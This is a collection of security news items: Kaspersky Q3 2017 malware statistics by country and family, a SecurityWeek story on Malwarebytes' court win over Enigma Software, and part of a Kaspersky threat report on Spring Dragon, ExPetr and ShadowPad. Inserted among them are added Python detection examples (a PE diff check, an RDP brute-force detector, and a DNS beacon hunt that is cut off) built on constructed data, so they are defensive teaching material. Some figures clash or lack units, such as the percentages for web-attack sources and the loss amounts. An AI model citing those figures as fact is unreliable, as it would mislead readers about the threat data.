** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

In Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.

Of particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn’t make it into our Top 10 this quarter. This was due to a decrease in activity by the Trojan-Banker.AndroidOS.Acecard and Trojan-Banker.AndroidOS.Marcher mobile banking families.

Mobile ransomware
In Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, which is almost half as many as in the previous quarter.

Number of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 – Q3 2017)

In our report for Q2, we wrote that in the first half of 2017, we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family’s activity.

Trojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, Trojan-Ransom.AndroidOS.Fusob.h, which topped the rating for several quarters in a row, was only third in Q3 2017.

Geography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)

Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):

Country* % of attacked users**
1 US 1.03%
2 Mexico 0.91%
3 Belgium 0.85%
4 Kazakhstan 0.79%
5 Romania 0.70%
6 Italy 0.50%
7 China 0.49%
8 Poland 0.49%
9 Austria 0.45%
10 Spain 0.33%
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab’s mobile security product in the country.

The US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.

In Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.

Vulnerable apps exploited by cybercriminals
Q3 2017 saw continued growth in the number of attacks launched against users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing an exploit as well as a phishing message – in case the embedded exploit fails.

Although two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in processing HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% of users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.

There were no large network attacks (such as WannaCry or ExPetr) launched in Q3 using vulnerabilities patched by the MS17-010 update. However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability; however, KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue, however, accounts for millions of blocked attempted attacks per month, while the numbers for other exploits are much lower.

Distribution of exploits used in attacks by type of application attacked, Q3 2017

The distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components with a share of 35.0% (a decline of 4 p.p. compared to Q2.) The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.

Online threats (Web-based attacks)
These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources.

Online threats in the banking sector
These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning with the first quarter of 2017, these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats.

In Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.

Number of users attacked by financial malware, Q3 2017

Geography of attacks
To evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.

Geography of banking malware attacks in Q3 2017 (percentage of all users attacked)

TOP 10 countries attacked by banking malware (ranked by percentage of users attacked)

Country* % of users attacked**
1 Togo 2.30
2 China 1.91
3 Taiwan 1.65
4 Indonesia 1.58
5 South Korea 1.56
6 Germany 1.53
7 United Arab Emirates 1.52
8 Lebanon 1.48
9 Libya 1.43
10 Jordan 1.33
These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000).
** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country.

TOP 10 banking malware families
The table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):

Name* % of attacked users**
1 Trojan-Spy.Win32.Zbot 27.9
2 Trojan.Win32.Nymaim 20.4
3 Trojan.Win32.Neurevt 10.0
4 Trickster 9.5
5 SpyEye 7.5
6 Caphaw 6.3
7 Trojan-Banker.Win32.Gozi 2.0
8 Shiz 1.8
9 ZAccess 1.6
10 NeutrinoPOS 1.6
* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware.

The malware families Dridex and Tinba lost their places in this quarter’s Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%) whose share grew by nearly 4 p.p.

Cryptoware programs
Q3 highlights
Crysis rises from the dead
In our Q2 report we wrote that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files. This took place in May 2017, and all propagation of the ransomware was stopped completely at that time.

However, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing – the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn’t have the source code, so they just took its old body and used a hex editor to change the key and the contact email.

The above suggests that this piece of ‘zombie’ malware is being spread by a different group of malicious actors rather than its original developer who disclosed all the private keys in May.
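As an added example (not Kaspersky’s code), this is how an analyst can check the observation above on two sample builds: read the COFF compilation timestamp from each and locate the byte ranges that differ, expecting them to fall only inside the key and contact e-mail fields. The two samples are constructed minimal PE-like buffers with assumed field offsets, not real Crysis binaries.

```python
"""Byte-level comparison of two sample builds (added example, not Kaspersky's code).

The report says revived Crysis samples were identical to the old ones except for
the embedded public master key and contact e-mail, with the PE compilation
timestamp unchanged. This script performs that check on two CONSTRUCTED minimal
PE-like buffers; the key/e-mail field offsets below are assumptions for the demo.
"""
import struct
from typing import Dict, List, Tuple

DOS_STUB_LEN = 0x40                     # e_lfanew points just past the DOS stub
COFF_OFF = DOS_STUB_LEN + 4             # COFF header follows the "PE\0\0" signature
CODE = bytes.fromhex("558bec") * 20     # constructed stand-in for unchanged code bytes
KEY_OFF = COFF_OFF + 20 + len(CODE)     # assumed location of the embedded public key
KEY_LEN = 32
EMAIL_OFF = KEY_OFF + KEY_LEN           # assumed location of the contact e-mail
EMAIL_LEN = 40
FIELDS = {"key": (KEY_OFF, KEY_OFF + KEY_LEN),
          "email": (EMAIL_OFF, EMAIL_OFF + EMAIL_LEN)}


def build_sample(key: bytes, email: bytes, timestamp: int) -> bytes:
    """Constructed minimal PE-like image: DOS stub, PE signature, COFF header, body."""
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", DOS_STUB_LEN)
    # COFF: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    #       NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x014C, 1, timestamp, 0, 0, 0, 0x0102)
    body = (CODE
            + key.ljust(KEY_LEN, b"\0")[:KEY_LEN]
            + email.ljust(EMAIL_LEN, b"\0")[:EMAIL_LEN])
    return dos + b"PE\0\0" + coff + body


def pe_timestamp(data: bytes) -> int:
    """Return the COFF TimeDateStamp (the compilation timestamp) of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return struct.unpack_from("<I", data, e_lfanew + 8)[0]


def diff_ranges(a: bytes, b: bytes) -> List[Tuple[int, int]]:
    """Half-open [start, end) ranges where two equal-sized buffers differ."""
    if len(a) != len(b):
        raise ValueError("sizes differ: not a byte-patched copy of the same build")
    ranges, start = [], None
    for i, (x, y) in enumerate(zip(a, b)):
        if x != y and start is None:
            start = i
        elif x == y and start is not None:
            ranges.append((start, i))
            start = None
    if start is not None:
        ranges.append((start, len(a)))
    return ranges


def classify(old: bytes, new: bytes) -> Dict[str, object]:
    """Triage verdict: is `new` the old build with only key/e-mail bytes patched?"""
    def inside(r: Tuple[int, int], f: Tuple[int, int]) -> bool:
        return f[0] <= r[0] and r[1] <= f[1]

    ranges = diff_ranges(old, new)
    touched = sorted({n for r in ranges for n, f in FIELDS.items() if inside(r, f)})
    only_fields = all(any(inside(r, f) for f in FIELDS.values()) for r in ranges)
    return {
        "same_timestamp": pe_timestamp(old) == pe_timestamp(new),
        "changed_fields": touched,
        "only_known_fields": only_fields,   # True => hex-edited copy, not a rebuild
        "diff_ranges": ranges,
    }


# Constructed samples: the old build patched in place, versus a recompiled build.
OLD = build_sample(b"OLDKEY", b"old@example.invalid", 0x59A00000)
PATCHED = build_sample(b"NEWKEY", b"new@example.invalid", 0x59A00000)
REBUILT = build_sample(b"NEWKEY", b"new@example.invalid", 0x59B00000)

if __name__ == "__main__":
    print("patched:", classify(OLD, PATCHED))
    print("rebuilt:", classify(OLD, REBUILT))
```

A result with the same timestamp and differences confined to the known fields supports the "edited with a hex editor" reading; a changed timestamp or differences outside those fields points to a recompiled build.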

Surge in Cryrar attacks
The Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate executable RAR archiver file to place the victim’s files in password-encrypted RAR-sfx archives.

In the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar – a surge never seen before or since. The malicious actors used the following approach: they crack the password to RDP by brute force, get authentication on the victim’s system using the remote access protocol and manually launch the Trojan’s installation file. The latter, in turn, installs the cryptor’s body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.

According to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.
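An added detection example (not Kaspersky’s code) for the intrusion chain described above: a burst of failed RDP logons from one source, a successful RDP logon from the same source, then a process started by that account shortly afterwards. It runs over constructed Windows Security log records reduced to the fields the rule needs; event IDs 4625, 4624 and 4688 and logon type 10 are the standard Windows values, while the thresholds, addresses and file names are assumptions.

```python
"""RDP brute-force-then-manual-launch detection (added example, not Kaspersky's code).

Correlates three Windows Security events: a burst of 4625 (failed logon), a 4624
(successful logon) from the same source, and 4688 (process creation) by that
account soon after. Logon type 10 is RemoteInteractive, i.e. RDP. Thresholds,
addresses and file names below are assumptions; the events are CONSTRUCTED.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed sample events (not real logs), reduced to the fields the rule needs.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"time": "2017-09-03T02:10:05", "id": 4625, "src": "203.0.113.10", "user": "administrator", "logon_type": 10},
    {"time": "2017-09-03T02:10:12", "id": 4625, "src": "203.0.113.10", "user": "administrator", "logon_type": 10},
    {"time": "2017-09-03T02:10:19", "id": 4625, "src": "203.0.113.10", "user": "administrator", "logon_type": 10},
    {"time": "2017-09-03T02:10:26", "id": 4625, "src": "203.0.113.10", "user": "administrator", "logon_type": 10},
    {"time": "2017-09-03T02:10:33", "id": 4625, "src": "203.0.113.10", "user": "administrator", "logon_type": 10},
    {"time": "2017-09-03T02:10:40", "id": 4625, "src": "203.0.113.10", "user": "administrator", "logon_type": 10},
    {"time": "2017-09-03T02:11:02", "id": 4624, "src": "203.0.113.10", "user": "administrator", "logon_type": 10},
    {"time": "2017-09-03T02:13:30", "id": 4688, "user": "administrator",
     "process": r"C:\Users\administrator\Downloads\update_installer.exe"},  # assumed name
    # Benign noise: one mistyped password, then a normal RDP session from another address.
    {"time": "2017-09-03T08:00:01", "id": 4625, "src": "192.0.2.5", "user": "jdoe", "logon_type": 10},
    {"time": "2017-09-03T08:00:20", "id": 4624, "src": "192.0.2.5", "user": "jdoe", "logon_type": 10},
    {"time": "2017-09-03T08:01:00", "id": 4688, "user": "jdoe", "process": r"C:\Windows\explorer.exe"},
]


def detect_rdp_bruteforce_chain(events, min_failures=5,
                                window=timedelta(minutes=10),
                                followup=timedelta(minutes=15)):
    """Return one alert per source that brute-forced RDP and then logged on.

    Each alert lists the processes the account started within `followup` of the
    logon; a non-empty list is the "manual launch" stage described in the text.
    """
    events = sorted(events, key=lambda e: e["time"])   # ISO-8601 strings sort correctly
    failures = defaultdict(list)   # src -> timestamps of recent RDP failures
    alerts = {}                    # src -> alert being built
    for e in events:
        t = datetime.fromisoformat(e["time"])
        if e["id"] == 4625 and e.get("logon_type") == 10:
            # keep only failures inside the sliding window
            failures[e["src"]] = [x for x in failures[e["src"]] if t - x <= window] + [t]
        elif e["id"] == 4624 and e.get("logon_type") == 10:
            n = len([x for x in failures[e["src"]] if t - x <= window])
            if n >= min_failures:
                alerts[e["src"]] = {"src": e["src"], "user": e["user"], "failures": n,
                                    "logon_time": e["time"], "processes": []}
        elif e["id"] == 4688:
            # 4688 carries the account, not the source address: correlate on user.
            for a in alerts.values():
                t0 = datetime.fromisoformat(a["logon_time"])
                if a["user"] == e["user"] and timedelta(0) <= t - t0 <= followup:
                    a["processes"].append(e["process"])
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_rdp_bruteforce_chain(SAMPLE_EVENTS):
        print(alert)
```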

Master key to original versions of Petya/Mischa/GoldenEye published
In July 2017, the authors of the Petya Trojan published their master key, which can be used to decrypt the Salsa keys required to decrypt MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.

This happened shortly after the ExPetr epidemic which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.

Unfortunately, this master key won’t help those affected by ExPetr, as its creators didn’t include the option of restoring a Salsa key to decrypt MFT.

The number of new modifications
In Q3 2017, we identified five new ransomware families in this classification. It’s worth noting here that this number doesn’t include all the Trojans that weren’t assigned their own ‘personal’ verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they and the hundreds of others like them remain nameless, and are detected with generic verdicts.

Number of newly created cryptor modifications, Q3 2016 – Q3 2017

The number of new cryptor modifications continues to decline compared to previous quarters. This could be a temporary trend, or could indicate that cybercriminals are gradually losing their interest in cryptors as a means of making money, and are switching over to other types of malware.

The number of users attacked by ransomware
July was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than May and June when two massive epidemics (WannaCry and ExPetr) struck.

Number of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)

The geography of attacks

Top 10 countries attacked by cryptors
Country* % of users attacked by cryptors**
1 Myanmar 0.95%
2 Vietnam 0.92%
3 Indonesia 0.69%
4 Germany 0.62%
5 China 0.58%
6 Russia 0.51%
7 Philippines 0.50%
8 Venezuela 0.50%
9 Cambodia 0.50%
10 Austria 0.49%
* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000)
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country.

Most of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.

Brazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10. Europe is represented by Germany (0.62%) and Austria (0.49%).

Russia, in tenth the previous quarter, ended Q3 in sixth place.

Top 10 most widespread cryptor families
Name Verdict* % of attacked users**
1 WannaCry Trojan-Ransom.Win32.Wanna 16.78%
2 Crypton Trojan-Ransom.Win32.Cryptoff 14.41%
3 Purgen/GlobeImposter Trojan-Ransom.Win32.Purgen 6.90%
4 Locky Trojan-Ransom.Win32.Locky 6.78%
5 Cerber Trojan-Ransom.Win32.Zerber 4.30%
6 Cryrar/ACCDFISA Trojan-Ransom.Win32.Cryrar 3.99%
7 Shade Trojan-Ransom.Win32.Shade 2.69%
8 Spora Trojan-Ransom.Win32.Spora 1.87%
9 (generic verdict) Trojan-Ransom.Win32.Gen 1.77%
10 (generic verdict) Trojan-Ransom.Win32.CryFile 1.27%
* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware.

WannaCry (16.78%) tops the rating for Q3, and the odds are that it’s set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that WannaCry exploits.

Crypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.

The cryptor Purgen (6.90%) rounds off the top three after rising from ninth. The rest of the rating is populated by ‘old timers’ – the Trojans Locky, Cerber, Cryrar, Shade, and Spora.

The Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.

Top 10 countries where online resources are seeded with malware
The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In the third quarter of 2017, Kaspersky Lab solutions blocked 277,646,376 attacks launched from web resources located in 185 countries around the world. 72,012,219 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q3 2017

In Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Belarus 27.35
2 Algeria 24.23
3 Russia 23.91
4 Armenia 23.74
5 Moldova 23.61
6 Greece 21.48
7 Azerbaijan 21.14
8 Kyrgyzstan 20.83
9 Uzbekistan 20.24
10 Albania 20.10
11 Ukraine 19.82
12 Kazakhstan 19.55
13 France 18.94
14 Venezuela 18.68
15 Brazil 18.01
16 Portugal 17.93
17 Vietnam 17.81
18 Tajikistan 17.63
19 Georgia 17.50
20 India 17.43
These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.
* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

On average, 16.61% of computers connected to the Internet globally were subjected to at least one Malware-class web attack during the quarter.

Geography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).

Local threats
Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2017, Kaspersky Lab’s file antivirus detected 198,228,428 unique malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating of malicious programs only includes Malware-class attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of users attacked**
1 Yemen 56.89
2 Vietnam 54.32
3 Afghanistan 53.25
4 Uzbekistan 53.02
5 Laos 52.72
6 Tajikistan 49.72
7 Ethiopia 48.90
8 Syria 47.71
9 Myanmar 46.82
10 Cambodia 46.69
11 Iraq 45.79
12 Turkmenistan 45.47
13 Libya 45.00
14 Bangladesh 44.54
15 China 44.40
16 Sudan 44.27
17 Mongolia 44.18
18 Mozambique 43.84
19 Rwanda 43.22
20 Belarus 42.53
These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users’ computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives.
* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked Malware-class local threats as a percentage of all unique users of Kaspersky Lab products.

This Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance. The proportion of users attacked in Russia amounted to 29.09%.

On average, 23.39% of computers globally faced at least one Malware-class local threat during the third quarter.

Geography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)

The safest countries in terms of local infection risks included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Malwarebytes Scores Legal Win Over Enigma Software
 12.11.2017 securityweek Cyber
Enigma Software, supplier of software known as SpyHunter, has a notice on its website: "Malwarebytes Inc., the maker of Malwarebytes Anti-Malware ("MBAM") and AdwCleaner, is intentionally blocking SpyHunter and RegHunter for what we believe are competitive reasons... We have taken legal action against Malwarebytes and are seeking remedies for this unfair conduct."

Those legal remedies were dismissed by the District Court, Northern District of California, San Jose Division on November 7, 2017.

The heart of the issue has been Malwarebytes' determination that SpyHunter is effectively a PUP; that is, a potentially unwanted program. PUPs tend to be nuisances rather than specifically malware. They are often adware apps that are easy to install and difficult to remove, offering little practical value to the consumer. Malwarebytes has been one of the more aggressive endpoint protection vendors in its classification and removal of PUPs.

It does so with SpyHunter -- and Enigma Software objected. Enigma's legal complaint claimed that Malwarebytes' actions were competitively motivated, and it asked the court for "Preliminarily and permanently enjoining Malwarebytes from programming MBAM to prevent the download and installation of SpyHunter or RegHunter;" adding a request for "punitive damages".

In response, Malwarebytes requested the court to dismiss Enigma's action, citing immunity under the Communications Decency Act -- which states, "No provider or user of an interactive computer service shall be held liable on account of... any action voluntarily taken in good faith to restrict access to or availability of material that the provider or user considers to be obscene, lewd, lascivious, filthy, excessively violent, harassing, or otherwise objectionable, whether or not such material is constitutionally protected..."

The court agreed, confirmed Malwarebytes' immunity, and dismissed Enigma's case.

This doesn't mean that SpyHunter is legally a PUP, only that Enigma cannot stop Malwarebytes from offering users the option to remove it under its PUP program.

F-Secure's Sean Sullivan commented, "We at F-Secure have our own PUP criteria in our efforts to do what's best and right for our customers -- and I'm comfortable that's exactly the intentions of the folks at Malwarebytes. Fighting for their customers -- good for them!"

Malwarebytes is delighted. "This is not only a critical win for Malwarebytes, but for all security providers who will continue to have legal protection to do what is right for their users," blogged CEO Marcin Kleczynski yesterday. "This decision affirms our right to enable users by giving them a choice on what belongs on their machines and what doesn't."

It's too early to tell whether this is the beginning of the end of the PUP problem. "I'm not sure how much difference isolated instances of case law will make in the short term," comments ESET senior research fellow, David Harley, "but anything that tends to make monetization firms more answerable to the needs of the population as a whole -- or at least that sector of the population whose interests the security industry aims to protect -- is positive. It might be better in the long term, though, if the software distribution and monetization industries and the security vendors work out their differences in the context of the Clean Software Alliance. Well, we can but hope," he added.

Luis Corrons, technical director at PandaLabs, is not sure that the battle can be won in the courts. "All PUP fights in court, win or lose," he told SecurityWeek, "are a waste of time and resources for all of us. We could fight in court for ages and that won't help anyone."

Instead, he hopes for a solution via a relatively new organization, AppEsteem. "It is time to take a different approach in this field," he continued. "Here what AppEsteem is doing has the potential to be a game-changer that helps everyone: users not being bothered by software that does not behave properly, security vendors focusing only on protecting their users and software vendors making money by being transparent and offering real value to end users."

AppEsteem's president, Dennis Batchelder, is clear, however. The result from the courts is "great for security companies, but more importantly, this dismissal is a big win for consumers. Security companies can truly put protection first. This strengthens AppEsteem's resolve to call out every deceptive app and drive a world where consumers are safe from fraud."

IT threat evolution Q3 2017
11.11.2017 Kaspersky Cyber
Targeted attacks and malware campaigns
[Re-]enter the dragon
In July, we reported on the recent activities of a targeted attack group called ‘Spring Dragon’ (also known as LotusBlossom), whose activities date back to 2012. Spring Dragon makes extensive use of spear-phishing and watering-hole attacks. The group’s targets include high-profile government agencies, political parties, educational institutions and telecommunications companies around the South China Sea – including Taiwan, Indonesia, Vietnam, the Philippines, Hong Kong, Malaysia and Thailand.

Most of the malicious tools implemented by Spring Dragon over the years are backdoors designed to steal data, execute additional malware components and run system commands on victims’ computers. These give the attackers the ability to undertake a variety of different malicious activities on their victims’ computers. The group maintains a large C2 infrastructure, comprising more than 200 unique IP addresses and C2 domains.

The large number of samples that we have collected have customized configuration data, different sets of C2 addresses with new hardcoded campaign IDs, as well as customized configuration data for creating a service for malware on a victim’s system – all of which makes detection more difficult.

We think it is likely that Spring Dragon, like many other targeted attack campaigns, will re-surface in this region, so it is important for organisations to make effective use of good detection mechanisms such as YARA rules and IDS signatures.

You can read our report on Spring Dragon here.

One of the most striking aspects of the ExPetr attacks earlier this year was its primary attack vector: the attackers specifically targeted a company supplying accounting software to Ukrainian companies. Most of the victims of this wiper were located in Ukraine. However, it recently became clear that the attack has had a significant impact on some companies that operate worldwide. Among them is Maersk, the world’s largest container ship and supply vessel company. The company indicated in its earnings report that it expected losses of between $200 and $300 as a result of ‘significant business interruption’ caused by the ExPetr attack. Another was FedEx, which revealed that the operations of its TNT Express unit in Europe were ‘significantly affected’ by the attack, costing the company around $300 in lost earnings.

In recent months, we have seen further cases of attackers compromising software supply chain providers and using this as a stepping-stone into their chosen targets.

In July, we discovered suspicious DNS requests on the network of a customer working in the financial services industry: we found the requests on systems used to process transactions. The source of the DNS queries was a package for popular server management software developed by NetSarang. Customers of NetSarang, which has headquarters in South Korea and the United States, include companies working in financial services, energy, retail, technology and media. The attackers had modified one of the updates to include a backdoor.

NetSarang quickly removed the compromised update, but not before it had been activated at least once (we were able to confirm an activation on a computer in Hong Kong).

The attackers hide their malicious intent in several layers of encrypted code. The tiered architecture means that the business logic of the backdoor is not activated until a special packet has been received from the first tier C2 (Command and Control) server. Until then, it transfers basic information every eight hours: this includes computer, domain and user names. The payload is only activated through a crafted ‘dns.txt’ record for a specific domain. This allows the attackers to glean system information and send a decryption key to unlock the next stage of the attack, activating the backdoor itself.

This backdoor, called ShadowPad, is a modular platform that lets the attackers download and execute arbitrary code, create processes and maintain a virtual file system in the registry, all of which are encrypted and stored in locations unique to each victim.
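The first-tier behaviour described above (a periodic DNS beacon carrying host details, with activation through a TXT record) leaves a detectable trace in DNS query logs. The following is an added example, not Kaspersky's code: it scans constructed log lines for TXT queries whose leftmost label looks like encoded data and that recur from one host at a near-fixed interval. The log format, domain names, entropy and jitter thresholds are all assumptions.

```python
"""Hunt for ShadowPad-style DNS beaconing in a DNS query log: TXT queries whose
leftmost label looks like encoded data, recurring from one host at a near-fixed
interval (the report describes an eight-hour cadence)."""
import math
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Tuple

# Constructed log lines (not taken from the report): "timestamp client qtype qname".
# 10.1.4.22 beacons every eight hours to a placeholder domain; 10.1.4.23 is benign.
SAMPLE_LOG = """\
2017-07-17T00:02:11Z 10.1.4.22 A www.example.com
2017-07-17T01:00:03Z 10.1.4.22 TXT 3k9v2qzx8fjw1pqm7aal.beacon-c2.example
2017-07-17T03:14:55Z 10.1.4.22 A updates.example.com
2017-07-17T09:00:07Z 10.1.4.22 TXT p8rt6bm2kc0xq4hsz91d.beacon-c2.example
2017-07-17T12:30:00Z 10.1.4.23 TXT _dmarc.example.com
2017-07-17T17:00:05Z 10.1.4.22 TXT ztp39lq7xm5ak2hcw0en.beacon-c2.example
2017-07-18T01:00:09Z 10.1.4.22 TXT mf27xkq8zr4wd1pvb0hn.beacon-c2.example
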